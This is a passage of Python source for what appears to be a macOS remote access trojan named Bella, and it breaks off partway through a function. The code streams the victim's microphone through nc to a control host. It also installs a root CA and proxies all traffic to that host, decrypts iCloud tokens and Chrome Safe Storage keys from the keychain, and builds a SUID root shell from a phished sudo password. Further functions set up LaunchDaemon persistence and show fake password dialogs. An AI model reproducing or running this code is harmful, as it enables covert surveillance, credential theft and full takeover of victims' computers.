value += "\n%sChrome Safe Storage%s\nPrompt the keychain to present the user's Chrome Safe Storage Key.\nUsage: %schrome_safe_storage%s\nRequirements: None\n" % (underline + bold + green, endANSI, bold, endANSI)
value += "\n%sCurrent Users%s\nFind all currently logged in users.\nUsage: %scurrentUsers%s\nRequirements: None\n" % (underline + bold + yellow, endANSI, bold, endANSI)
value += "\n%sGet Root%s\nAttempt to escalate Bella to root through a variety of attack vectors.\nUsage: %sget_root%s\nRequirements: None\n" % (underline + bold + red, endANSI, bold, endANSI)
value += "\n%sFind my iPhone%s\nLocate all devices on the user's iCloud account.\nUsage: %siCloud_FMIP%s\nRequirements: iCloud Password [see iCloud_phish]\n" % (underline + bold + light_blue, endANSI, bold, endANSI)
value += "\n%sFind my Friends%s\nLocate all shared devices on the user's iCloud account.\nUsage: %siCloud_FMF%s\nRequirements: iCloud Token or iCloud Password\n" % (underline + bold + light_blue, endANSI, bold, endANSI)
value += "\n%siCloud Contacts%s\nGet contacts from the user's iCloud account.\nUsage: %siCloud_contacts%s\nRequirements: iCloud Token or iCloud Password\n" % (underline + bold + light_blue, endANSI, bold, endANSI)
value += "\n%siCloud Password Phish%s\nTrick user into verifying their iCloud password through iTunes prompt.\nUsage: %siCloudPhish%s\nRequirements: None\n" % (underline + bold + light_blue, endANSI, bold, endANSI)
value += "\n%siCloud Query%s\nGet information about the user's iCloud account.\nUsage: %siCloud_query%s\nRequirements: iCloud Token or iCloud Password\n" % (underline + bold + light_blue, endANSI, bold, endANSI)
value += "\n%siCloud Token%s\nPrompt the keychain to present the User's iCloud Authorization Token.\nUsage: %siCloud_token%s\nRequirements: None\n" % (underline + bold + light_blue, endANSI, bold, endANSI)
value += "\n%sInsomnia Load%s\nLoads an InsomniaX Kext to prevent laptop from sleeping, even when closed.\nUsage: %sinsomnia_load%s\nRequirements: root, laptops only\n" % (underline + bold + yellow, endANSI, bold, endANSI)
value += "\n%sInsomnia Unload%s\nUnloads an InsomniaX Kext loaded through insomnia_load.\nUsage: %sinsomnia_unload%s\nRequirements: root, laptops only\n" % (underline + bold + yellow, endANSI, bold, endANSI)
value += "\n%sBella Info%s\nExtensively details information about the user and information from the Bella instance.\nUsage: %sbella_info%s\nRequirements: None\n" % (underline + bold + yellow, endANSI, bold, endANSI)
value += "\n%sKeychain Download%s\nDownloads all available Keychains, including iCloud, for offline processing.\nUsage: %skeychain_download%s\nRequirements: None\n" % (underline + bold + light_blue, endANSI, bold, endANSI)
value += "\n%sMike Stream%s\nStreams the microphone input over a socket.\nUsage: %smike_stream%s\nRequirements: None\n" % (underline + bold + light_blue, endANSI, bold, endANSI)
value += "\n%sMITM Start%s\nInjects a Root CA into the System Roots Keychain and redirects all traffic to the CC.\nUsage: %smitm_start%s\nRequirements: root.\n" % (underline + bold + yellow, endANSI, bold, endANSI)
value += "\n%sMITM Kill%s\nEnds a MITM session started by MITM start.\nUsage: %smitm_kill%s\nRequirements: root.\n" % (underline + bold + yellow, endANSI, bold, endANSI)
value += "\n%sReboot Server%s\nRestarts a Bella instance.\nUsage: %sreboot_server%s\nRequirements: None.\n" % (underline + bold + yellow, endANSI, bold, endANSI)
value += "\n%sSafari History%s\nDownloads user's Safari history in a nice format.\nUsage: %ssafari_history%s\nRequirements: None.\n" % (underline + bold + light_blue, endANSI, bold, endANSI)
value += "\n%sScreenshot%s\nTake a screen shot of the current active desktop.\nUsage: %sscreen_shot%s\nRequirements: None.\n" % (underline + bold + yellow, endANSI, bold, endANSI)
value += "\n%sShutdown Server%s\nUnloads Bella from launchctl until next reboot.\nUsage: %sshutdown_server%s\nRequirements: None.\n" % (underline + bold + yellow, endANSI, bold, endANSI)
value += "\n%sSystem Information%s\nReturns basic information about the system.\nUsage: %ssysinfo%s\nRequirements: None.\n" % (underline + bold + yellow, endANSI, bold, endANSI)
value += "\n%sUser Pass Phish%s\nWill phish the user for their password with a clever dialog.\nUsage: %suser_pass_phish%s\nRequirements: None.\n" % (underline + bold + yellow, endANSI, bold, endANSI)
#value += "\n%sInteractive Shell%s\nLoads an interactive reverse shell (bash) to the remote machine.\nUsage: %sinteractiveShell%s\n" % (underline + bold, endANSI, bold, endANSI)
#value += "\n%sKey Start%s\nBegin keylogging in the background.\nUsage: %skeyStart%s (requires root)\n" % (underline + bold, endANSI, bold, endANSI)
#value += "\n%sKey Kill%s\nStop keylogging started through Key Start\nUsage: %skeyStart%s (requires root)\n" % (underline + bold, endANSI, bold, endANSI)
#value += "\n%sKey Read%s\nReads the encrypted key log file from Key Start.\nUsage: %skeyRead%s (requires root)\n" % (underline + bold, endANSI, bold, endANSI)
return value
def mike_helper(payload_path):
stream_port = 2897
send_msg('%sOpening microphone.\n' % blue_star, False)
pipe = subprocess.Popen('%s' % payload_path, stdout=subprocess.PIPE)
subprocess_manager(pipe.pid, '/'.join(payload_path.split('/')[:-1]), 'Microphone') #keep track of mikepipe since it never closes, as well as payload path
send_msg('%sOpened microphone [%s].\n' % (blue_star, pipe.pid), False)
send_msg('%sOpening Stream.\n' % blue_star, False)
stream = subprocess.Popen(('nc %s %s' % (host, stream_port)).split(), stdin=pipe.stdout, stdout=subprocess.PIPE)
time.sleep(2) #give a few seconds to terminate if not running ...
#stream.poll will be the exit code if it has exited, otherwise it will be None (so, None if we are connected)
if stream.poll(): #if None, we are connected, see Else. If an integer, we have crashed.
send_msg('%sListener could not be reached. Closing microphone.\n' % red_minus, False)
if kill_pid(pipe.pid):
send_msg('%sClosed microphone.\n' % blue_star, True)
else:
send_msg('%sError closing microphone with PID [%s].\n' % (red_minus, pipe.pid), True)
else:
send_msg('%sListener connected, microphone streaming.\n' % greenPlus, True)
return 0
def mitm_kill(interface, certsha1):
if not is_there_SUID_shell():
return "%sYou must have a root shell to stop MITM. See rooter.\n" % red_minus
x = check_output("networksetup -getsecurewebproxy %s" % interface)
if not x[0]:
if x[2] == 8:
send_msg("%sThe interface [%s] does not exist." % (red_minus, interface), True)
send_msg(x[1], True)
if "Enabled: No" in x[1]:
send_msg("%s\033[4mAlready disabled!\033[0m %s\n%s" % (yellow_star, yellow_star, x[1]), True)
return
cert = cert_remove(certsha1)
if 'Error' in cert:
send_msg('ERROR REMOVING CERTIFICATE FROM KEYCHAIN. YOU SHOULD PERFORM MANUALLY.\n', False)
send_msg(cert, False)
(success, msg) = do_root("networksetup -setwebproxy %s '' 0" % interface)
if not success:
send_msg("%sSetting [%s] HTTP proxy to null failed!\n" % (red_minus, interface), False)
else:
send_msg("%sSet [%s] HTTP proxy to null.\n" % (greenPlus, interface), False)
(success, msg) = do_root("networksetup -setsecurewebproxy %s '' 0" % interface)
if not success:
send_msg("%sSetting [%s] HTTPS proxy to null failed!\n" % (red_minus, interface), False)
else:
send_msg("%sSet [%s] HTTPS proxy to null.\n" % (greenPlus, interface), False)
(success, msg) = do_root("networksetup -setwebproxystate %s off" % interface)
if not success:
send_msg("%sFailed to turn off [%s] HTTP proxy!\n" % (red_minus, interface), False)
else:
send_msg("%sTurned off [%s] HTTP proxy.\n" % (greenPlus, interface), False)
(success, msg) = do_root("networksetup -setsecurewebproxystate %s off" % interface)
if not success:
send_msg("%sFailed to turn off [%s] HTTP proxy!\n" % (red_minus, interface), False)
else:
send_msg("%sTurned off [%s] HTTP proxy.\n" % (greenPlus, interface), False)
send_msg('', True)
return 1
def mitm_start(interface, cert):
if not is_there_SUID_shell():
return "%sYou must have a root shell to start MITM. See rooter.\n" % red_minus
x = check_output("networksetup -getsecurewebproxy %s" % interface)
if not x[0]:
if x[2] == 8:
send_msg("%sThe interface [%s] does not exist." % (red_minus, interface), True)
send_msg(x[1], True)
if "Enabled: Yes" in x[1]:
send_msg("%s\033[4mAlready enabled!\033[0m %s\n%s" % (yellow_star, yellow_star, x[1]), True)
send_msg('', True)
return
cert = cert_inject(cert)
if 'Error' in cert:
send_msg(cert, True)
send_msg('', True)
return
send_msg(cert, False)
(success, msg) = do_root("networksetup -setwebproxy %s %s 8081" % (interface, host))
if not success:
send_msg("%sRedirecting [%s] HTTP (80) to [%s:8081] failed!\n" % (red_minus, interface, host), True)
send_msg("%sRedirecting [%s] HTTP (80) to [%s:8081].\n" % (greenPlus, interface, host), False)
(success, msg) = do_root("networksetup -setsecurewebproxy %s %s 8081" % (interface, host))
if not success:
send_msg("%sRedirecting [%s] HTTPS (443) to [%s:8081] failed!\n" % (red_minus, interface, host), True)
send_msg("%sRedirecting [%s] HTTP (443) to [%s:8081].\n" % (greenPlus, interface, host), False)
send_msg("mitmReady", True)
return
def payload_generator(data):
dirpath = tempfile.mkdtemp()
with open("%s/americangirl" % dirpath, "wb") as content:
content.write(data.decode('base64'))
os.chmod("%s/americangirl" % dirpath, 0777) #set rw execute bits to 7 for ugw
temp_file_list.append(dirpath)
return '%s/americangirl' % dirpath
def payload_cleaner():
for x in temp_file_list:
try:
shutil.rmtree(x)
#print 'Removed %s' % x
temp_file_list.remove(x)
except OSError as e:
pass
print e
return
def chainbreaker(kcpath, key, service):
kcbreaker = readDB('chainbreaker', True)
if not kcbreaker:
return ("%sError reading chainbreaker from DB.\n" % red_minus, False)
path = payload_generator(kcbreaker)
try:
value = (subprocess.check_output("%s -f '%s' -k '%s' -s '%s'" % (path, kcpath, key, service), shell=True).replace('\n', ''), True)
if '[!] ERROR: ' in value[0]:
return ("%sError decrypting %s with master key.\n\t%s" % (red_minus, service, value[0]), False)
print repr(value[0])
if value[0] == '':
return ("No KC entry for %s." % service, False)
return value
except Exception as e:
return ("%sError decrypting %s with master key.\n\t%s" % (red_minus, service, e), False)
def kciCloudHelper(iCloudKey):
#this function is tailored to keychaindump. Takes an iCloud key, and returns tokens
msg = base64.b64decode(iCloudKey)
key = "t9s\"lx^awe.580Gj%'ld+0LG<#9xa?>vb)-fkwb92[}"
hashed = hmac.new(key, msg, digestmod=hashlib.md5).digest()
hexedKey = binascii.hexlify(hashed)
IV = 16 * '0'
mme_token_file = glob("/Users/%s/Library/Application Support/iCloud/Accounts/*" % get_bella_user()) #this doesnt need to be globber bc only current user's info can be decrypted
for x in mme_token_file:
try:
int(x.split("/")[-1])
mme_token_file = x
except ValueError:
continue
send_msg("\t%sDecrypting token plist\n\t [%s]\n" % (blue_star, mme_token_file), False)
decryptedBinary = subprocess.check_output("openssl enc -d -aes-128-cbc -iv '%s' -K %s < '%s'" % (IV, hexedKey, mme_token_file), shell=True)
from Foundation import NSData, NSPropertyListSerialization
binToPlist = NSData.dataWithBytes_length_(decryptedBinary, len(decryptedBinary))
token_plist = NSPropertyListSerialization.propertyListWithData_options_format_error_(binToPlist, 0, None, None)[0]
tokz = "[%s | %s]\n" % (token_plist["appleAccountInfo"]["primaryEmail"], token_plist["appleAccountInfo"]["fullName"])
tokz += "%s:%s\n" % (token_plist["appleAccountInfo"]["dsPrsID"], token_plist["tokens"]["mmeAuthToken"])
return tokz
def getKeychains():
send_msg("%sFound the following keychains for [%s]:\n" % (yellow_star, get_bella_user()), False)
kchains = glob("/Users/%s/Library/Keychains/login.keychain*" % get_bella_user())
for x in kchains:
send_msg("\t[%s]\n" % x, False)
if len(kchains) == 0:
send_msg("%sNo Keychains found for [%s].\n" % (yellow_star, get_bella_user()), True)
return
kchain = kchains[-1]
for x in kchains:
if x.endswith('-db'):
kchain = x
return kchain
def bella_info():
mainString = ""
send_msg("%sGathering system information.\n" % yellow_star, False)
systemVersion = str(platform.mac_ver()[0])
send_msg("%sSystem version is %s.\n" % (blue_star, systemVersion), False)
send_msg("%sShell location: [%s].\n" % (blue_star, get_bella_path()), False)
send_msg(blue_star + get_model(), False)
try:
battery = subprocess.check_output("pmset -g batt", shell=True).decode('utf-8', 'replace').split('\t')[1].split(";")
charging = battery[1].replace(" ", "")
percentage = battery[0]
if charging == "charging":
send_msg("%sBattery: %s [Charging]\n" % (blue_star, percentage), False)
else:
send_msg("%sBattery: %s [Discharging]\n" % (blue_star, percentage), False)
except:
pass
if not systemVersion.startswith("10.12"):
if systemVersion == "10.11.1" or systemVersion == "10.11.2" or systemVersion == "10.11.3" or not systemVersion.startswith("10.11"):
if is_there_SUID_shell(): #normal user.
send_msg("%sHave root access via SUID shell. [use get_root to escalate]\n" % greenPlus, False)
else:
send_msg("%sPrivilege escalation is possible!\n" % blue_star, False) #LPA possible, no need to display sudoers access info.. right?
else:
if os.getuid() == 0:
send_msg("%sBella is running as root.\n" % greenPlus, False)
elif is_there_SUID_shell():
send_msg("%sHave root access via SUID shell. [use get_root to escalate]\n" % greenPlus, False)
else:
send_msg("%sNo root access via SUID shell.\n" % red_minus, False)
filevault = check_output("fdesetup status")
if filevault[0]:
if "On" in filevault[1]:
send_msg(red_minus + filevault[1], False)
else:
send_msg(greenPlus + filevault[1], False)
if systemVersion.startswith("10.11") or systemVersion.startswith("10.12"):
csrutil = subprocess.Popen(["csrutil status"], stdout=subprocess.PIPE, shell=True)
(out, err) = csrutil.communicate()
if "disabled" in out:
send_msg(greenPlus + out, False)
sipEnabled = False #SIP function exists, but is specifically and intentionally disabled! (enterprise environments likely have this config)
if "enabled" in out:
send_msg(red_minus + out, False)
sipEnabled = True
else:
sipEnabled = False
if not sipEnabled: #sipDisabled allows us to check like .1% of cases where user is on El Cap and has opted out of SIP
if is_there_SUID_shell():
kcpayload = readDB('keychaindump', True)
if not kcpayload:
send_msg("%sError reading KCDump payload from Bella Database.\n" % red_minus, False)
else:
kcpath = payload_generator(kcpayload)
kchain = getKeychains()
(success, msg) = do_root("%s '%s' | grep 'Found master key:'" % (kcpath, kchain)) # ??? Why doesnt this work for tim?
if success:
send_msg(" Login keychain master key found for [%s]:\n\t[%s]\n" % (kchain.split("/")[-1], msg.replace("[+] Found master key: ", "").replace("\n", "")), False)
if not readDB('mme_token'):
send_msg("\t%sAttempting to generate iCloud Auth Keys.\n" % blue_star, False)
iCloud = chainbreaker(kchain, msg.replace("[+] Found master key: ", "").replace("\n", ""), 'iCloud')
send_msg("\t%siCloud:\n\t [%s]\n" % (yellow_star, iCloud[0]), False)
if iCloud[1]:
send_msg("\t%sGot iCloud Key! Decrypting plist.\n" % yellow_star, False)
decrypted = kciCloudHelper(iCloud[0])
if not decrypted:
send_msg("\t%sError getting decrypted MMeAuthTokens with this key.\n" % red_minus, False)
else:
send_msg("\t%sDecrypted. Updating Bella database.\n" % blue_star, False)
updateDB(encrypt(decrypted), 'mme_token')
send_msg("\t%sUpdated DB.\n\t --------------\n" % greenPlus, False)
if not readDB('chromeSS'):
send_msg("\t%sAttempting to generate Chrome Safe Storage Keys.\n" % blue_star, False)
chrome = chainbreaker(kchain, msg.replace("[+] Found master key: ", "").replace("\n", ""), 'Chrome Safe Storage')
send_msg("\t%sChrome:\n\t [%s]\n" % (yellow_star, chrome[0]), False)
if chrome[1]:
send_msg("\t%sGot Chrome Key! Updating Bella DB.\n" % yellow_star, False)
updateDB(encrypt(chrome[0]), 'chromeSS')
send_msg("\t%sUpdated DB.\n" % greenPlus, False)
else:
send_msg("%sError finding %slogin%s master key for user [%s].\n\t%s\n" % (red_minus, bold, endANSI, get_bella_user(), msg), False)
(success, msg) = do_root("%s '/Library/Keychains/System.keychain' | grep 'Found master key:'" % kcpath)
if success:
msg = msg.replace("[+] Found master key: ", "").replace("\n", "")
if msg != '':
send_msg("%sSystem keychain master key found:\n [%s]\n" % (greenPlus, msg), False)
else:
send_msg("%sCould not find %sSystem%s master key.\n" % (red_minus, bold, endANSI), False)
payload_cleaner()
iTunesSearch = get_iTunes_accounts()
for x in iTunesSearch:
if x[0]:
send_msg("%siCloud account present [%s:%s]\n" % (greenPlus, x[2], x[1]), False)
else:
send_msg(red_minus + x[1], False)
iOSbackups = iTunes_backup_looker()
if iOSbackups[1]:
send_msg("%siOS backups are present and ready to be processed. [%s]\n" % (greenPlus, iOSbackups[2]), False)
else:
send_msg("%sNo iOS backups are present.\n" % red_minus, False)
if os.access('/var/db/lockdown', os.X_OK): #if we can execute this path
send_msg("%siOS lockdown files are present. [%s]\n" % (greenPlus, len(os.listdir("/var/db/lockdown")) - 1), False)
checkToken = tokenRead()
if isinstance(checkToken, str):
send_msg("%siCloud AuthToken: %s\n\t[%s]\n" % (yellow_star, checkToken.split('\n')[0], checkToken.split('\n')[1]), False)
checkChrome = chromeSSRead()
if isinstance(checkChrome, str):
send_msg("%sGoogle Chrome Safe Storage Key: \n\t[%s]\n" % (yellow_star, checkChrome), False)
checkLP = local_pw_read()
if isinstance(checkLP, str):
send_msg("%s%s's local account password is available.\n" % (yellow_star, checkLP.split(':')[0]), False) #get username
checkAP = applepwRead()
if isinstance(checkAP, str):
send_msg("%s%s's iCloud account password is available.\n" % (yellow_star, checkAP.split(':')[0]), False)
send_msg('', True)
return 1
def recv_msg(sock):
raw_msglen = recvaux(sock, 4, True) #get first four bytes of message, will be enough to represent length.
if not raw_msglen:
return None
msglen = struct.unpack('>I', raw_msglen)[0] #convert this length into
return recvaux(sock, msglen, False)
def recvaux(sock, n, length):
if length:
return sock.recv(4) # send over first 4 bytes of socket ....
data = ''
while len(data) < n:
packet = sock.recv(n - len(data))
if not packet:
return None
data += packet
return pickle.loads(data) #convert from serialized into normal.
def make_SUID_root_binary(password, LPEpath):
root_shell = readDB("root_shell", True)
with open("/usr/local/roots", "w") as content:
content.write(root_shell.decode('base64'))
if not LPEpath: #use password
(username, password) = password.split(':')
try:
subprocess.check_output("echo %s | sudo -S ls" % password, shell=True) #this will return no error if successfull
except Exception as e:
return (False, "%sUser's local password does not give us sudo access!\n" % red_minus)
try:
subprocess.check_output("echo %s | sudo -S chown 0:0 /usr/local/roots; echo %s | sudo -S chmod 4777 /usr/local/roots" % (password, password), shell=True) #perform setUID on shell
except Exception as e:
return (False, "%sUser's local password gives us sudo access!\n%sThere was an error setting the SUID bit.\n[%s]\n" % (greenPlus, red_minus, e))
return (True, "%sUser's local password gives us sudo access!\n%sSUID root file written to /usr/local/roots!\n" % (blue_star, greenPlus))
else:
#LPEpath should be a path to an interactive root shell (thinking mach race)
#### IF THIS LINE IS STILL HERE, THEN THIS MACH RACE / LPE DOES NOT WORK. Code needs to be added to actually install the shell ####
try:
subprocess.check_output("%s <<< 'chown 0:0 /usr/local/roots; chmod 4777 /usr/local/roots'" % LPEpath, shell=True) #perform setUID on shell
return (True, "%sUser is susceptible to LPE!\n%sSUID root file written to /usr/local/roots!\n" % (blue_star, greenPlus))
except Exception as e:
return (False, "%sUser is susceptible to LPE!\n%sThere was an error setting the SUID bit.\n[%s]\n" % (greenPlus, red_minus, e))
def migrateToRoot(rootsPath):
#precondition to this function call is that a root shell exists at /usr/local/roots and that os.getuid != 0
#therefore, we will not use the do_root() function, and will instead call the roots binary directly.
#we do this because we want full control over what happens. The migration is a critical process
#no room for error. an error could break our shell.
### in order to test this function in development, bella must be installed through the INSTALLER script generated by BUILDER
relativeBellaPath = '/' + '/'.join(get_bella_path().split("/")[3:])
if not os.path.isfile('%sbella.db' % get_bella_path()): #if we can execute this path
send_msg("Migration aborted. Could not find bella.db in\n\t[%s]" % get_bella_path(), False)
return
if not os.path.isfile('%sBella' % get_bella_path()): #if we can execute this path
send_msg("%sMigration halted. Could not find Bella binary in:\n\t[%s].\n" % (red_minus, get_bella_path()), False)
return
if not os.path.isfile('/Users/%s/Library/LaunchAgents/%s.plist' % (get_bella_user(), launch_agent_name)): #if we can execute this path
send_msg("%sMigration halted. Could not find LaunchAgent in:\n\t[/Users/%s/Library/LaunchAgents/%s.plist].\n" % (red_minus, get_bella_user(), launch_agent_name), False)
return
"""Create new bella location in /Library"""
error = Popen("%s \"mkdir -p '%s'\"" % (rootsPath, relativeBellaPath), shell=True, stdout=PIPE, stderr=PIPE).stderr.read()
if error != '':
send_msg("%sError creating path:\n\t%s" % (red_minus, error), False)
return
else:
send_msg("%sCreated path '%s'.\n" % (blue_star, relativeBellaPath), False)
"""Copy bella database from current helper_location to new one in /Library"""
error = Popen("%s \"cp '%sbella.db' '%sbella.db'\"" % (rootsPath, get_bella_path(), relativeBellaPath), shell=True, stdout=PIPE, stderr=PIPE).stderr.read()
if error != '':
send_msg("%sError copying Bella DB:\n\t%s" % (red_minus, error), False)
return
else:
send_msg("%sCopied Bella DB '%sbella.db' to '%sbella.db'.\n" % (blue_star, get_bella_path(), relativeBellaPath), False)
"""Copy bella binary from current helper_location to new one in /Library"""
error = Popen("%s \"cp '%sBella' '%sBella'\"" % (rootsPath, get_bella_path(), relativeBellaPath), shell=True, stdout=PIPE, stderr=PIPE).stderr.read()
if error != '':
send_msg("%sError copying Bella binary:\n\t%s" % (red_minus, error), False)
return
else:
send_msg("%sCopied Bella binary '%sBella' to '%sBella'.\n" % (blue_star, get_bella_path(), relativeBellaPath), False)
"""Copy bella launch_agent_name from current one to new one in /Library/LaunchDaemons"""
error = Popen("%s \"cp '/Users/%s/Library/LaunchAgents/%s.plist' '/Library/LaunchDaemons/%s.plist'\"" % (rootsPath, get_bella_user(), launch_agent_name, launch_agent_name), shell=True, stdout=PIPE, stderr=PIPE).stderr.read()
if error != '': #cp bella db to /Library (root location)
send_msg("%sError copying launchagent '/Users/%s/Library/LaunchAgents/%s.plist' to '/Library/LaunchDaemons/%s.plist'.\n" % (red_minus, get_bella_user(), launch_agent_name, launch_agent_name), False)
return
else:
send_msg("%sCopied launchagent '/Users/%s/Library/LaunchAgents/%s.plist' to '/Library/LaunchDaemons/%s.plist'.\n" % (blue_star, get_bella_user(), launch_agent_name, launch_agent_name), False)
"""Replace path to bella binary in the new launchDaemon"""
error = Popen("%s \"sed -i \'\' -e 's@/Users/%s/Library/@/Library/@' /Library/LaunchDaemons/%s.plist\"" % (rootsPath, get_bella_user(), launch_agent_name), shell=True, stdout=PIPE, stderr=PIPE).stderr.read()
if error != '':
send_msg("%sError replacing LaunchDaemon in line:\n\t%s" % (red_minus, error), False)
return
else:
send_msg("%sReplaced LaunchDaemon in line.\n" % blue_star, False)
"""Load new LaunchDaemon and then 'delete' the server"""
error = Popen("%s \"launchctl load -w /Library/LaunchDaemons/%s.plist\"" % (rootsPath, launch_agent_name), shell=True, stdout=PIPE, stderr=PIPE).stderr.read()
if 'service already loaded' not in error and error != '':
send_msg("%sError loading LaunchDaemon:\n\t%s" % (red_minus, error), False)
return
else:
send_msg("%sLoaded LaunchDaemon.\n" % blue_star, False)
send_msg("%sRemoving current server.\n" % yellow_star, False)
removeServer()
return
def removeServer():
subprocess_cleanup()
destroyer = "rm -rf %s" % get_bella_path()
if os.getuid() == 0:
destroyer += "; rm -f /Library/LaunchDaemons/%s.plist" % (launch_agent_name)
else:
destroyer += "; rm -f /Users/%s/Library/LaunchAgents/%s.plist" % (get_bella_user(), launch_agent_name)
os.system(destroyer)
send_msg("Server destroyed.\n", True)
unloader = "launchctl remove %s" % launch_agent_name
os.system(unloader)
def rooter(): #ROOTER MUST BE CALLED INDEPENDENTLY -- Equivalent to getsystem
if os.getuid() == 0:
send_msg("%sWe are already root.\n" % yellow_star, True)
return
else:
send_msg("%sWe are not root. Attempting to root.\n" % blue_star, False)
sys_vers = str(platform.mac_ver()[0])
if is_there_SUID_shell():
migrateToRoot('/usr/local/roots')
send_msg('', True)
return
if local_pw_read():
send_msg("%sLocal PW present.\n" % greenPlus, False)
### We have a local password, let us try to use it to get a root shell ###
binarymake = make_SUID_root_binary(local_pw_read(), None)
send_msg(binarymake[1], False)
if binarymake[0]:
#updateDB('local user password', 'rootedMethod')
#send_msg('', True)
migrateToRoot('/usr/local/roots')
send_msg('', True)
return
else:
send_msg("%sNo local user password found. This will give us system and can be phished.\n" % red_minus, False)
if sys_vers.startswith("10.8") or sys_vers.startswith("10.9") or sys_vers.startswith("10.10") or sys_vers == ("10.11") or sys_vers == ("10.11.1") or sys_vers == ("10.11.2") or sys_vers == ("10.11.3"):
binarymake = make_SUID_root_binary(None, '%sexecuter/root_shell.sh' % get_bella_path())
if binarymake[0]:
#updateDB('local privilege escalation', 'rootedMethod')
send_msg(binarymake[1], False)
migrateToRoot('/usr/local/roots')
send_msg('', True)
return
send_msg("%sLocal privilege escalation not implemented for OSX %s\n" % (red_minus, sys_vers), True)
return
def tokenFactory(authCode):
#now that we have proper b64 encoded auth code, we will attempt to get all account tokens.
try:
req = urllib2.Request("https://setup.icloud.com/setup/get_account_settings")
req.add_header('Authorization', 'Basic %s' % authCode)
req.add_header('Content-Type', 'application/xml') #for account settings it appears we cannot use json. type must be specified.
req.add_header('X-MMe-Client-Info', '<iPhone6,1> <iPhone OS;9.3.2;13F69> <com.apple.AppleAccount/1.0 (com.apple.Preferences/1.0)>') #necessary header to get tokens.
resp = urllib2.urlopen(req)
content = resp.read()
tokens = []
#staple it together & call it bad weather
accountInfo = []
accountInfo.append(plistlib.readPlistFromString(content)["appleAccountInfo"]["fullName"] + " | " + plistlib.readPlistFromString(content)["appleAccountInfo"]["appleId"] + " | " + plistlib.readPlistFromString(content)["appleAccountInfo"]["dsPrsID"])
try:
tokens.append(plistlib.readPlistFromString(content)["tokens"]["mmeAuthToken"])
except:
pass
try:
tokens.append(plistlib.readPlistFromString(content)["tokens"]["cloudKitToken"])
except:
pass
try:
tokens.append(plistlib.readPlistFromString(content)["tokens"]["mmeFMFAppToken"])
except:
pass
try:
tokens.append(plistlib.readPlistFromString(content)["tokens"]["mmeFMIPToken"])
except:
pass
try:
tokens.append(plistlib.readPlistFromString(content)["tokens"]["mmeFMFToken"])
except:
pass
return (tokens, accountInfo)
except Exception, e:
return '%s' % e
def tokenForce():
global bellaConnection
token = tokenRead()
if token != False:
send_msg("%sFound already generated token!%s\n%s" % (blue_star, blue_star, token), True)
return 1
while True: #no token exists, begin blast
### sooooo turns out that SIP disables dtrace related things from working ... so this is useless 10.11 and up. will
### switch out for chain breaker
from Foundation import NSData, NSPropertyListSerialization
### CTRLC listener
bellaConnection.settimeout(0.0)
try: #SEE IF WE HAVE INCOMING MESSAGE MID LOOP
if recv_msg(bellaConnection) == 'sigint9kill':
sys.stdout.flush()
send_msg('terminated', True) #send back confirmation along with STDERR
done = True
bellaConnection.settimeout(None)
return 1
except socket.error as e: #no message, business as usual
pass
bellaConnection.settimeout(None)
kchain = getKeychains()
send_msg("%sUsing [%s] as keychain.\n" % (yellow_star, kchain), False)
iCloudKey = check_output("launchctl asuser %s security find-generic-password -ws 'iCloud' '%s'" % (bella_UID, kchain))
if not iCloudKey[0]:
if 51 == iCloudKey[2]:
send_msg("%sUser clicked deny.\n" % red_minus, False)
continue
elif 44 == iCloudKey[2]:
send_msg("%sNo iCloud Key Found!\n" % red_minus, True)
return 0
else:
send_msg("Strange error [%s]\n" % iCloudKey[1], True)
return 0
iCloudKey = iCloudKey[1].replace('\n', '')
msg = base64.b64decode(iCloudKey)
key = "t9s\"lx^awe.580Gj%'ld+0LG<#9xa?>vb)-fkwb92[}"
hashed = hmac.new(key, msg, digestmod=hashlib.md5).digest()
hexedKey = binascii.hexlify(hashed)
IV = 16 * '0'
mme_token_file = glob("/Users/%s/Library/Application Support/iCloud/Accounts/*" % get_bella_user()) #this doesnt need to be globber bc only current user's info can be decrypted
for x in mme_token_file:
try:
int(x.split("/")[-1])
mme_token_file = x
except ValueError:
continue
send_msg("%sDecrypting token plist\n\t[%s]\n" % (blue_star, mme_token_file), False)
decryptedBinary = subprocess.check_output("openssl enc -d -aes-128-cbc -iv '%s' -K %s < '%s'" % (IV, hexedKey, mme_token_file), shell=True)
binToPlist = NSData.dataWithBytes_length_(decryptedBinary, len(decryptedBinary))
token_plist = NSPropertyListSerialization.propertyListWithData_options_format_error_(binToPlist, 0, None, None)[0]
tokz = "[%s | %s]\n" % (token_plist["appleAccountInfo"]["primaryEmail"], token_plist["appleAccountInfo"]["fullName"])
tokz += "%s:%s\n" % (token_plist["appleAccountInfo"]["dsPrsID"], token_plist["tokens"]["mmeAuthToken"])
logged = updateDB(encrypt(tokz), 'mme_token') #update the DB....
send_msg(tokz, True)
return 1
def tokenRead():
token = readDB('mme_token')
if not token:
return token
return decrypt(token)
def chromeSSRead():
sskey = readDB('chromeSS')
if not sskey:
return sskey
return decrypt(sskey)
def local_pw_read():
pw = readDB('localPass')
if not pw:
return pw
return decrypt(pw)
def applepwRead():
pw = readDB('applePass')
if not pw:
return pw
return decrypt(pw)
def screenShot():
screen = os.system("screencapture -x /tmp/screen")
try:
with open("/tmp/screen", "r") as shot:
contents = base64.b64encode(shot.read())
os.remove("/tmp/screen")
return "screenCapture%s" % contents
except IOError:
return "screenCapture%s" % "error"
def send_msg(msg, EOF):
global bellaConnection
msg = pickle.dumps((msg, EOF))
finalMsg = struct.pack('>I', len(msg)) + msg #serialize into string. pack bytes so that recv function knows how many bytes to loop
bellaConnection.sendall(finalMsg) #send serialized
def getWifi():
ssid = subprocess.Popen("/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -I", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
try:
value = ssid.stdout.read().split('SSID: ')[-1].split('\n')[0] + ssid.stderr.read()
except Exception as e:
value = "AirPort: Off"
return value
def user_pass_phish():
global bellaConnection
userTB = cur_GUI_user()
wifiNetwork = getWifi()
icon = readDB('lock_icon', True)
if not icon:
send_msg('Error generating lock icon, using system default.\n')
path = ':System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:Actions.icns'
else:
path = payload_generator(icon).replace("/", ":")
send_msg("Attempting to phish current GUI User [%s]\n" % userTB, False)
while True:
### CTRLC listener
bellaConnection.settimeout(0.0)
try: #SEE IF WE HAVE INCOMING MESSAGE MID LOOP
if recv_msg(bellaConnection) == 'sigint9kill':
sys.stdout.flush()
send_msg('terminated', True) #send back confirmation along with STDERR
done = True
bellaConnection.settimeout(None)
return 1
except socket.error as e: #no message, business as usual
pass
bellaConnection.settimeout(None)
check = local_pw_read()
if isinstance(check, str):
